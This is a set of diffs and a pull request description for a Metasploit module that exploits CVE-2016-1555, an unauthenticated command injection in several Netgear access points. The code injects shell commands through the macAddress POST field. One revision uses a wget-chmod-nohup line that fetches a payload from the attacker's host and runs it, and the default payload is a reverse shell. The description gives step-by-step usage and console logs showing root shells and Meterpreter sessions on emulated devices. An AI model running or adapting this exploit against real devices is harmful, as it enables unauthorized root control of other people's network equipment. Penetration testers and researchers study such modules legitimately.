+      'Description' => %q{
+        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
+        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
+        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
+        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
+        arbitrary commands.
+      },
+      'Author'      =>
+        [
+          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
+          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2016-1555'],
+          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
+          ['PACKETSTORM', '135956'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
+        ],
+      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'Payload'     => {},
+      'DefaultOptions' => {
+        'PAYLOAD'  => 'linux/mipsbe/shell_reverse_tcp',
+        'WfsDelay' => 5 },
+      'Targets'        =>
+        [
+          [ 'Automatic',	{ } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptPath.new('URI_LIST', [true,  "The vulnerable URIs.", '/usr/share/metasploit-framework/data/wordlists/netgear_boardData_paths.txt']),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 5]),
+      ])
+    deregister_options('SSL') # because victim side does not support SSL
+    deregister_options('SSLCert') # if SSL is disabled, might as well disable this for cleaner interface
+  end
+
+  # post request
+  def request_post(uri,command)
+    response = send_request_cgi({
+      'uri'    => uri,
+      'method' => 'POST',
+      'data'   => "macAddress=000000000000;#{command};&reginfo=1&writeData=Submit\r\n"
+    })
+    return response
+  end
+
+  # get request
+  def request_get(uri)
+    response = send_request_cgi({
+      'uri'    => normalize_uri('/', uri),
+      'method' => 'GET'
+    })
+    return response
+  end
+
+  # find the vulnerable uri(s)
+  def find_uri
+    conn_check = request_get("/")
+    if not conn_check
+      return :fail
+    else
+      File.read(datastore['URI_LIST']).each_line do |uri|
+        response_get = request_get(uri.chomp)
+        if response_get && response_get.code == 200
+#          print_good("Got 200 OK for #{uri.chomp}")
+          return uri.chomp
+        end
+      end
+      return :fail.to_s
+    end
+  end
+
+  # check for vulnerability existence
+  def check
+    lhost = datastore['LHOST'] # implied
+    vuln_check_param = "ping -c 1 #{lhost}"
+    target_uri = find_uri
+    if target_uri == "fail"
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    else
+      print_status("Checking for existence of vulnerability in #{target_uri}...")
+      response_post = request_post(target_uri,vuln_check_param)
+      if response_post && response_post.code == 200
+        print_good("Got 200 OK for #{target_uri}")
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+
+  # the exploit method
+  def exploit
+    # run a check before attempting to exploit
+    unless [CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    end
+
+    lhost = datastore['LHOST'].to_s
+    downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile # the payload to be downloaded
+    service_url = service_url = 'http://' + lhost + ':' + datastore['SRVPORT'].to_s + resource_uri # the full path of the payload on our web server
+    vuln_uri = find_uri
+
+    # payload creation
+    @pl = generate_payload_exe
+    @elf_sent = false
+
+    print_status("Starting the web service on #{service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+     }})
+
+    filename = downfile
+    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; nohup /tmp/#{filename}"
+    register_file_for_cleanup("/tmp/#{filename}")
+    res = request_post(vuln_uri,cmd)
+  end
+
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+    wait_linux_payload
+  end
+
+
+  # wait for the data to be sent
+  def wait_linux_payload
+    if @elf_sent == true
+      stop_service
+    end
+    while (not @elf_sent)
+      select(nil, nil, nil, 1)
+      wait_time += 1
+      if (wait_time > datastore['HTTP_DELAY'])
+        fail_with(Failure::Unknown, "Target didn't request request the ELF payload!")
+      end
+    end
+  end
+end

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -37,15 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
       'Privileged'     => true,
       'Platform'       => 'linux',
-      'Arch'        => ARCH_MIPSBE,
-      'Payload'     => {},
+      'Arch'           => ARCH_MIPSBE,
+      'Payload'        => {},
       'DefaultOptions' => {
         'PAYLOAD'  => 'linux/mipsbe/shell_reverse_tcp',
         'WfsDelay' => 5 },
-      'Targets'        =>
-        [
-          [ 'Automatic',	{ } ]
-        ],
+      'Targets'        => [[ 'Automatic',	{ }]],
       'DefaultTarget'  => 0
       ))
 
@@ -60,46 +57,48 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # post request
   def request_post(uri,command)
-    response = send_request_cgi({
+    send_request_cgi({
       'uri'    => uri,
       'method' => 'POST',
       'data'   => "macAddress=000000000000;#{command};&reginfo=1&writeData=Submit\r\n"
     })
-    return response
   end
 
   # get request
   def request_get(uri)
-    response = send_request_cgi({
+    send_request_cgi({
       'uri'    => normalize_uri('/', uri),
       'method' => 'GET'
     })
-    return response
   end
 
-  # find the vulnerable uri(s)
+
+  # check for existence of vulnerable URIs
   def find_uri
     conn_check = request_get("/")
-    if not conn_check
+
+    unless conn_check
       return :fail
-    else
-      File.read(datastore['URI_LIST']).each_line do |uri|
-        response_get = request_get(uri.chomp)
-        if response_get && response_get.code == 200
-          return uri.chomp
-        end
-      end
-      return :fail.to_s
     end
+
+    File.read(datastore['URI_LIST']).each_line do |uri|
+      response_get = request_get(uri.chomp)
+      if response_get && response_get.code == 200
+        return uri.chomp
+      end
+    end
+
+    :fail
   end
+
 
   # check for vulnerability existence
   def check
     lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
-    vuln_check_param = "ping -c 1 #{lhost}" # make this an actual check instead of a ping
+    vuln_check_param = "echo asdf | " # make this an actual check instead of a ping
     target_uri = find_uri
     if target_uri == "fail"
-      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+      vprint_error(Failure::NotVulnerable, 'Target is not vulnerable.')
     else
       response_post = request_post(target_uri,vuln_check_param)
       if response_post && response_post.code == 200 # and includes something that ensures that it's vulnerable
@@ -118,8 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote
     unless [CheckCode::Vulnerable].include? check
       fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     end
+
     lhost = datastore['LHOST'].to_s
-    downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8))
+    downfile = datastore['URIPATH'] || rand_text_alpha(8..16)
     resource_uri = '/' + downfile # the payload to be downloaded
     service_url = service_url = 'http://' + lhost + ':' + datastore['SRVPORT'].to_s + resource_uri # the full path of the payload on our web server
     vuln_uri = find_uri
@@ -149,6 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error("A request came in, but the payload wasn't ready yet!")
       return
     end
+
     print_status("Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
@@ -161,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if @elf_sent == true
       stop_service
     end
+
     while (not @elf_sent)
       select(nil, nil, nil, 1)
       wait_time += 1

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -40,11 +40,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' => {
         'CMDSTAGER::FLAVOR' => 'wget',
         'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
-        'WfsDelay'          => 5 },
-      'Targets'        => [[ 'Automatic',	{ }]],
+        'WfsDelay'          => 10 },
+      'Targets'        => [['Automatic', { }]],
       'CmdStagerFlavor'=> %w{ echo printf wget },
       'DefaultTarget'  => 0
       ))
+      register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']),
+        OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', rand_text_numeric(12)])
+      ])
   end
 
   def filter_bad_chars(cmd)
@@ -54,53 +59,50 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # post request
-  def request_post(command)
-    begin
-      send_request_cgi({
-        'method'  => 'POST',
-        'headers' => { 'Connection' => 'Keep-Alive' },
-        'uri'     => 'boardDataWW.php', # ARRRRRRGH, the worldwide one should be present everywhere
-        'query'   => Rex::Text.uri_encode(command, 'hex-all'),
-        'data'    => "macAddress=000000000000;#{filter_bad_chars(command)};&reginfo=1&writeData=Submit\r\n"
-      })
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
+  def request_post(command, targeturi, mac_addr)
+    send_request_cgi({
+    'method'  => 'POST',
+    'headers' => { 'Connection' => 'Keep-Alive' },
+    'uri'     => "#{targeturi}",
+    'data'    => "macAddress=#{mac_addr};#{filter_bad_chars(command)};&reginfo=1&writeData=Submit\r\n"
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
   end
 
   # check for vulnerability existence
   def check
-    vuln_check_param = "echo DEADBEEF31337" # if vulnerability is present, we will get this back in the response
-    raw_response_post = request_post(vuln_check_param) # the raw POST response
-    if raw_response_post
-      if raw_response_post.code == 200
-        response_body = raw_response_post.get_html_document # the body of the POST response
-        vuln_or_not = response_body.at('input[@value="000000000000;echo DEADBEEF31337;"]').to_s # if vulnerable, DEADBEEF31337 should be here
-        if vuln_or_not.include? "DEADBEEF31337" # undeniably vulnerable
-          return Exploit::CheckCode::Vulnerable
-        else
-          return Exploit::CheckCode::Appears
-        end
-      else
-        return Exploit::CheckCode::Detected
-      end
-    else
-      return Exploit::CheckCode::Safe
+    fingerprint = "echo DEADBEEF31337" # if vulnerability is present, we will get this back in the response
+    res = request_post(fingerprint, datastore['TARGETURI'], datastore['MAC_ADDRESS']) # the raw POST response
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
+
+    unless res.code == 200
+      return CheckCode::Safe
+    end
+
+    unless res.get_html_document.at('input').to_s.include? fingerprint
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
   end
 
   def execute_command(cmd, opts = {})
-      request_post(cmd)
+    request_post(cmd, datastore['TARGETURI'], datastore['MAC_ADDRESS'])
   end
 
   # the exploit method
   def exploit
     #run a check before attempting to exploit
     unless [CheckCode::Vulnerable].include? check
-        fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
 
-    execute_cmdstager
+    execute_cmdstager(linemax: 128)
   end
 
 end

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -47,33 +47,15 @@ class MetasploitModule < Msf::Exploit::Remote
       ))
       register_options(
       [
-        OptString.new('TARGET_URI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
+        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
         OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
       ])
   end
 
-  # post request
-  def request_post(command) # request_post(command, target_uri, mac_addr)
-    vars_post = {
-      'macAddress' => "#{datastore['MAC_ADDRESS']};#{command};",
-      'reginfo' => '1',
-      'writeData' => 'Submit'
-    }
-
-    send_request_cgi({
-    'method'  => 'POST',
-    'headers' => { 'Connection' => 'Keep-Alive' },
-    'uri'     => "#{datastore['TARGET_URI']}",
-    'vars_post' => vars_post
-    })
-  rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
-  end
-
   # check for vulnerability existence
   def check
-    fingerprint = "DEADBEEF31337" # If vulnerability is present, we will get this back in the response
-    res = request_post("echo #{fingerprint}") # the raw POST response
+    fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
+    res = execute_command("echo #{fingerprint}") # the raw POST response
 
     unless res
       vprint_error 'Connection failed'
@@ -91,8 +73,22 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Vulnerable
   end
 
+  # execute a command, or simply send a POST request
   def execute_command(cmd, opts = {})
-    request_post(cmd)
+    vars_post = {
+      'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
+      'reginfo' => '1',
+      'writeData' => 'Submit'
+    }
+
+    send_request_cgi({
+    'method'  => 'POST',
+    'headers' => { 'Connection' => 'Keep-Alive' },
+    'uri'     => normalize_uri(target_uri.path),
+    'vars_post' => vars_post
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
   end
 
   # the exploit method
@@ -101,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless [CheckCode::Vulnerable].include? check
       fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
-    
+
     execute_cmdstager(linemax: 2048) # maximum 130,000
   end
 


### PR DESCRIPTION
Add a new module for the CVE-2016-1555 vulnerability that targets the following Netgear devices with these firmwares:

- WN604 before 3.3.3
- WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

There are 5 possible vulnerable URIs (`boardData102.php`, `boardData103.php`, `boardDataNA.php`, `boardDataJP.php` and `boardDataWW.php`). `boardDataWW.php` will most likely be present in all vulnerable firmwares (WW for worldwide). The module "checks" for unauthenticated arbitrary command execution in the POST request sent to `boardDataWW.php`.

Tested on: Netgear WNAP320 firmware 2.0.3 and WN604 firmware 3.3.2, emulated with QEMU, setup by FIRMADYNE.

### Verification

- [x] run `msfconsole`
- [x] `use exploit/linux/http/netgear_unauth_exec`,
- [x] `set RHOST <target_ip>`
- [x] `set LHOST <your_ip>`
- [x] `set SRVHOST <your_ip>` if you aren't hosting your payload on some other server
- [x] `set TARGETURI boardData1xx.php` or `set TARGETURI boardDataXX.php` if you want to pwn the other URIs. Default `boardDataWW.php` should work fine.
- [x] Default payload is `linux/mipsbe/shell_reverse_tcp`. Set to `linux/mipsbe/meterpreter/reverse_tcp` to get Meterpreter session.
- [x] `exploit` for profit.
- [x] No vulnerable URI means that it automatically fails, for both `exploit` and `check`:
![pull3](https://user-images.githubusercontent.com/21966757/46646390-fa120380-cbaf-11e8-8357-d79e3ff18352.png)
- [x] Basic documentation can be found at the `documentation/modules/exploit/linux/http/netgear_unauth_exec.md` file

### Example Output with default payload (linux/mipsbe/shell_reverse_tcp)
```
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
[*] Command Stager progress - 118.97% done (138/116 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)
```

### Example Output with meterpreter
```
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
[*] Sending payload to 192.168.200.100 (Wget)
[*] Sending stage (1108408 bytes) to 192.168.200.100
[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
[*] Command Stager progress - 118.33% done (142/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.200.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
```

### Example Output using some other vulnerable URI (boardDataNA.php)
```
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
TARGETURI => boardDataNA.php
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
[*] Command Stager progress - 118.64% done (140/118 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)
```

### TODO LIST
- [x] Check for firmware version using a non-aggressive method. Firmware version can be found in `getBoardConfig.php`, which can (probably) be accessed without authorization. (EDIT: **NB: requires hardware**)
- [x] Stop the HTTP server after serving the payload! I think it doesn't stop properly after serving a payload or when a session is created. (EDIT: CmdStager makes this redundant)
- [x] When check is run explicitly, check for vulnerability in all the found URIs, not just the first one that's found. There are at least 2 vulnerable URIs, and one of them is most likely always `boardDataWW.php`. (EDIT: out of scope of the exploit module, would be a good idea for an auxiliary module though)
- [x] Test the module against the latest vulnerable firmware versions (WN604 firmware < 3.3.3 and WNAP320 firmware < 3.5.5.0). EDIT: Successful versus WN604 firmware 3.3.2, WNAP320 firmware 3.0.5.0 could not be emulated.
- [x] Update docs.